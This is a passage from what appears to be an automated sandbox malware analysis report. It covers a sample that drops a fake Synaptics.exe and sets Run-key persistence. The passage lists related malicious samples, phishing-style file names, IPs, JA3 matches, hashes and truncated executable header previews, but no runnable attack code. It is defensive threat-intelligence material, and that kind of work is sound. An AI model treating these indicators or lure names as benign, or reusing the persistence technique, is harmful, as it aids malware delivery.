                                                                                                                                                                                  04:37:53AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  04:38:12API Interceptor78x Sleep call for process: Synaptics.exe modified
                                                                                                                                                                                  04:38:47API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                                  IPs

                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                  69.42.215.2525dsSG5M8qx.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                                                  C8ooVHAEHT.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                                                  5dsSG5M8qx.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                                                  f0149392.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                                                  Synaptics.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                                                  A1FsbRkm5m.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                                                  Kxqpdqxjm.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                                                  Qewugmdc.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                                                  boot.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                                                  Eh9Oakf69S8uBz8.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                                                  22041081517_20220329_16042903_HesapOzeti.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                                                  TELEX_023_SWIFT.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                                                  SAQ6YCg6sJ.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                                                  Halkbank_Ekstre_20222501_073653_270424.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                                                  Halkbank_Ekstre_20222501_073653_270424.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                                                  lkvAkVxVSW.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                                                  SecuriteInfo.com.MachineLearning.Anomalous.95.21086.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                                                  synaptics.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                                                  synaptics.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                                                  scan-arrival document DHL -pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

                                                                                                                                                                                  Domains

                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                  freedns.afraid.org5dsSG5M8qx.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  C8ooVHAEHT.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  5dsSG5M8qx.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  f0149392.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  Synaptics.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  A1FsbRkm5m.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  Kxqpdqxjm.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  Qewugmdc.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  boot.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  Eh9Oakf69S8uBz8.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  22041081517_20220329_16042903_HesapOzeti.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  Halkbank_Ekstre_20222501_073653_270424.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  TELEX_023_SWIFT.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  SAQ6YCg6sJ.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  Halkbank_Ekstre_20222501_073653_270424.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  Halkbank_Ekstre_20222501_073653_270424.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  Halkbank_Ekstre_20222501_073653_270424.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  lkvAkVxVSW.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  SecuriteInfo.com.MachineLearning.Anomalous.95.21086.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  synaptics.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252

                                                                                                                                                                                  ASNs

                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                  AWKNET-LLCUS5dsSG5M8qx.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  C8ooVHAEHT.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  5dsSG5M8qx.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  f0149392.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  Synaptics.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  A1FsbRkm5m.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  Kxqpdqxjm.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  Qewugmdc.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  boot.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  Eh9Oakf69S8uBz8.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  22041081517_20220329_16042903_HesapOzeti.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  TELEX_023_SWIFT.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  SAQ6YCg6sJ.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  Halkbank_Ekstre_20222501_073653_270424.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  Halkbank_Ekstre_20222501_073653_270424.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  lkvAkVxVSW.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  SecuriteInfo.com.MachineLearning.Anomalous.95.21086.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  synaptics.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  synaptics.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252
                                                                                                                                                                                  scan-arrival document DHL -pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 69.42.215.252

                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                  37f463bf4616ecd445d4a1937da06e19LdbyBADfIR.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 172.217.168.14
                                                                                                                                                                                  https://express.adobe.com/page/vCTYm3h0r9BmZ/Get hashmaliciousBrowse
                                                                                                                                                                                  • 172.217.168.14
                                                                                                                                                                                  SecuriteInfo.com.W32.AIDetect.malware2.23037.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 172.217.168.14
                                                                                                                                                                                  http://akrurl.com/.2zpesGet hashmaliciousBrowse
                                                                                                                                                                                  • 172.217.168.14
                                                                                                                                                                                  TAX DOCUMENT.ppamGet hashmaliciousBrowse
                                                                                                                                                                                  • 172.217.168.14
                                                                                                                                                                                  https://www.paymentsjournal.com/analysts-coverage/Get hashmaliciousBrowse
                                                                                                                                                                                  • 172.217.168.14
                                                                                                                                                                                  Chrome.Quick.Update.ver.102.41.49568.jsGet hashmaliciousBrowse
                                                                                                                                                                                  • 172.217.168.14
                                                                                                                                                                                  Chrome.Quick.Update.ver.102.41.49568.jsGet hashmaliciousBrowse
                                                                                                                                                                                  • 172.217.168.14
                                                                                                                                                                                  https://servermail.nicepage.io/Home.htmlGet hashmaliciousBrowse
                                                                                                                                                                                  • 172.217.168.14
                                                                                                                                                                                  https://www.evernote.com/shard/s670/sh/55910dd8-9887-4018-3dce-75c372206cc5/1536ce86c6cb14e023f30a8fc3201040Get hashmaliciousBrowse
                                                                                                                                                                                  • 172.217.168.14
                                                                                                                                                                                  kyTwt6MpdH.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 172.217.168.14
                                                                                                                                                                                  https://www.extcovdoc125.org/Get hashmaliciousBrowse
                                                                                                                                                                                  • 172.217.168.14
                                                                                                                                                                                  https://bacguidelines.com/Get hashmaliciousBrowse
                                                                                                                                                                                  • 172.217.168.14
                                                                                                                                                                                  SecuriteInfo.com.W32.AIDetect.malware2.20966.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 172.217.168.14
                                                                                                                                                                                  https://urlsand.esvalabs.com/?u=https%3A%2F%2Fexpress.adobe.com%2Fpage%2FfeoM5782aYABf%2F&e=d02f10fa&h=34edaf6a&f=y&p=yGet hashmaliciousBrowse
                                                                                                                                                                                  • 172.217.168.14
                                                                                                                                                                                  DOC.003242628829.DOC.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 172.217.168.14
                                                                                                                                                                                  Invoice_payment_confirmation_567.htmlGet hashmaliciousBrowse
                                                                                                                                                                                  • 172.217.168.14
                                                                                                                                                                                  http://updates.password-update.com/76aaf4998a4ea5a3?l=13Get hashmaliciousBrowse
                                                                                                                                                                                  • 172.217.168.14
                                                                                                                                                                                  https://www.ftaviation.com.co/gen/geo.htm#jacques.federspiel@hopitauxschuman.luGet hashmaliciousBrowse
                                                                                                                                                                                  • 172.217.168.14
                                                                                                                                                                                  Endermanch@7ev3n.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 172.217.168.14

                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dllSecuriteInfo.com.W32.AIDetect.malware2.23037.exeGet hashmaliciousBrowse
                                                                                                                                                                                    SecuriteInfo.com.W32.AIDetect.malware2.23037.exeGet hashmaliciousBrowse
                                                                                                                                                                                      SecuriteInfo.com.Trojan.Siggen17.57062.9420.exeGet hashmaliciousBrowse
                                                                                                                                                                                        SecuriteInfo.com.Trojan.Siggen17.57062.9420.exeGet hashmaliciousBrowse
                                                                                                                                                                                          SecuriteInfo.com.W32.AIDetect.malware2.20966.exeGet hashmaliciousBrowse
                                                                                                                                                                                            SecuriteInfo.com.W32.AIDetect.malware2.20966.exeGet hashmaliciousBrowse
                                                                                                                                                                                              SecuriteInfo.com.generic.ml.22865.exeGet hashmaliciousBrowse
                                                                                                                                                                                                SecuriteInfo.com.generic.ml.22865.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  SecuriteInfo.com.Gen.Variant.Nemesis.7115.16481.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    SCAN Swift 054545676700000000000000001.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      SCAN Swift 054545676700000000000000001.exeGet hashmaliciousBrowse
                                                                                                                                                                                                        PO64747835 PDF.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          SecuriteInfo.com.Exploit.Rtf.Obfuscated.64.25308.rtfGet hashmaliciousBrowse
                                                                                                                                                                                                            SecuriteInfo.com.generic.ml.10062.exeGet hashmaliciousBrowse
                                                                                                                                                                                                              SecuriteInfo.com.generic.ml.10062.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                ALuh1ODGq3.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  SecuriteInfo.com.W32.AIDetect.malware2.14840.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                    SecuriteInfo.com.W32.AIDetect.malware2.14840.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      pago.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                        pago.exeGet hashmaliciousBrowse

                                                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_a5c396d0e6d651f539cd1b6dccb863d9c272052_455b7b6e_18c9b0c2\Report.wer

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                                          Entropy (8bit):1.1219130372828425
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:iQdUUyxVpsQmFHNVj8DzJDzqjut6aLAltU/u7suS274ItdKDzy:BX4yHNVj8JqjJc/u7suX4Itoy
                                                                                                                                                                                                                          MD5:003F3B5C61F927CD9B787EFC85CFD128
                                                                                                                                                                                                                          SHA1:AFACE7575FBA9BE51D3A0EF7798E5E0CEAC71ADF
                                                                                                                                                                                                                          SHA-256:CA2610FD60A185204D451E31D3A08CDC179FF690028244A0AB351012A3A8F2A6
                                                                                                                                                                                                                          SHA-512:EC770C5CF91DCF291FD6CE7CC68706B6FA65E742C38A30C40C6365A36C62DF6CACB69F6803591ADA0E43553F3E4710BD51597CBA9158968658FF349D871221F3
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.8.1.2.5.1.1.7.5.1.0.4.8.8.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.8.1.2.5.1.2.5.8.0.7.7.7.0.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.5.f.9.1.e.2.5.-.f.5.e.2.-.4.f.2.7.-.a.f.a.4.-.d.6.f.b.5.0.d.3.1.0.4.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.6.2.e.6.c.d.5.-.0.8.9.8.-.4.9.5.c.-.8.a.4.a.-.2.7.4.9.5.9.b.6.3.d.f.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.d.c.-.0.0.0.1.-.0.0.1.d.-.6.6.d.a.-.3.6.3.2.b.e.7.1.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.b.1.e.3.8.6.6.4.0.1.e.c.a.2.2.9.8.1.f.9.8.5.c.1.7.c.b.4.c.d.9.c.3.6.f.8.5.4.8.6.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER89B2.tmp.dmp

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          File Type:Mini DuMP crash report, 15 streams, Fri May 27 11:38:39 2022, 0x1205a4 type
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1808260
                                                                                                                                                                                                                          Entropy (8bit):2.0410087371425427
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6144:j/o7nWuYmkgEWOal8CjyCRz6v792U+0NPCv78dQA2A80yYC18gB174gZ+A2EN6z2:s7W1+EOqA2EszEjkgdvq0Izo
                                                                                                                                                                                                                          MD5:AE218CDBEA668F0A4ECA0E0CEEADF10D
                                                                                                                                                                                                                          SHA1:734CE669A774BF48825A22E9BD1DCC39B8A925D9
                                                                                                                                                                                                                          SHA-256:690770416AE3260176AD1AE53068D1482BD614DD03F3BF268D0918ACDF924B1D
                                                                                                                                                                                                                          SHA-512:6FAC3C611C885FEAA0E326DBF80C92099B7F9500BBDAF301E334287B065374B4210661B832A6A46F0D559E4FAA40869242F73D60AB0565CB4DB47B46C5BAC2B5
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:MDMP....... .......?..b........................<...........$....6...........;..........`.......8...........T...........................6...........8...................................................................U...........B......|9......GenuineIntelW...........T..............b.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERA317.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):6304
                                                                                                                                                                                                                          Entropy (8bit):3.7160926141417865
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:Rrl7r3GLNiFxgo6YRpzYiSySZCprj89bzfsfZZRm:RrlsNiko6YbYaS1zEfc
                                                                                                                                                                                                                          MD5:163948AFB76DB7C6562534638BF5F9F3
                                                                                                                                                                                                                          SHA1:D28346E8ED8F5DDE8D1A67B95EC925AF83116547
                                                                                                                                                                                                                          SHA-256:BA59DDBA3876E93D552AAAC43848866ABA08049FA9A7D1A336237026B638B078
                                                                                                                                                                                                                          SHA-512:484F5C7D2E1633CF1E6B3296550E06DCC42D62FE4A9AF3C0571E85FCC80B1F2F488F6CA91C1A9C30510B63B72403078CD600FE6C66DF3FA01B973BF1EFF1C594
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.2.0.<./.P.i.d.>.......

                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERA441.tmp.xml

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):4556
                                                                                                                                                                                                                          Entropy (8bit):4.44053755078757
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:48:cvIwSD8zsJJgtWI9TLWgc8sqYjz8fm8M4JFcF4s+q84GTm+ZVd:uITfbA6grsqYMJFs86+ZVd
                                                                                                                                                                                                                          MD5:30A47CA659D2F001C9D41BAA4A8369C7
                                                                                                                                                                                                                          SHA1:F29BCB524E226E1606A450E2E2B9366EBA51A2BB
                                                                                                                                                                                                                          SHA-256:887F5C49A39A5318BC5D9DBA9CF65F6E886DC80FDC261D0BC3575F2828B796EA
                                                                                                                                                                                                                          SHA-512:8016E1E6650692DB901F352DD22B10117B2ED8DA22DCB544F7CC80DCEE59B121E1E3A43E9C79DC111DD63B5C25D758F5E2F64148333F165E4F1D30E0134C5C90
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1533409" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                                                                                                                                                                          C:\ProgramData\Synaptics\RCXCD96.tmp

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\uniformerede.exe
                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):771584
                                                                                                                                                                                                                          Entropy (8bit):6.644060003425038
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9I4r:ansJ39LyjbJkQFMhmC+6GD9j
                                                                                                                                                                                                                          MD5:2A1D1C20CCA885322254DD2A22F51097
                                                                                                                                                                                                                          SHA1:B1E3866401ECA22981F985C17CB4CD9C36F85486
                                                                                                                                                                                                                          SHA-256:2B88A30E06873F61842038EC6C0E51B954DB482CD4641E33F01B3E80AF9F168D
                                                                                                                                                                                                                          SHA-512:ED72F56294BDF292A6EB1953CD657842CCFA2DCF3C5E69F24A1B11E19E5D8BD73DA5AAFB5F171CE91DBB07776CF8C2BF9028035E152E2CC8311A3CD21E51A886
                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCXCD96.tmp, Author: Joe Security
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                                                                          C:\ProgramData\Synaptics\Synaptics.exe

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\uniformerede.exe
                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1270272
                                                                                                                                                                                                                          Entropy (8bit):7.2217362129262685
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24576:TnsJ39LyjbJkQFMhmC+6GD9pYhK8VbNIf8gV2D:TnsHyjtk2MYC5GDwhKzy
                                                                                                                                                                                                                          MD5:FEDAD1ADEC8A1D90444051B5BDC6445D
                                                                                                                                                                                                                          SHA1:41AD10EE96250D8186D02E3D96923163CB664247
                                                                                                                                                                                                                          SHA-256:8B0667EC191E96C251FCE90FD0DEECCC09F1024F78FAF78B9FF32DED8B7CBB3D
                                                                                                                                                                                                                          SHA-512:303A40AC70E1E0BEDC08B55F5A0750A29F7E6EBCB55406293DD0F939D816CADC7FD0F6B604D607FD7478EB851A3648B1E5456CA51C971E494DA680FA44F5A8FE
                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................B*......t....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...t...........................@..P....................................@..P........................................................................................................................................

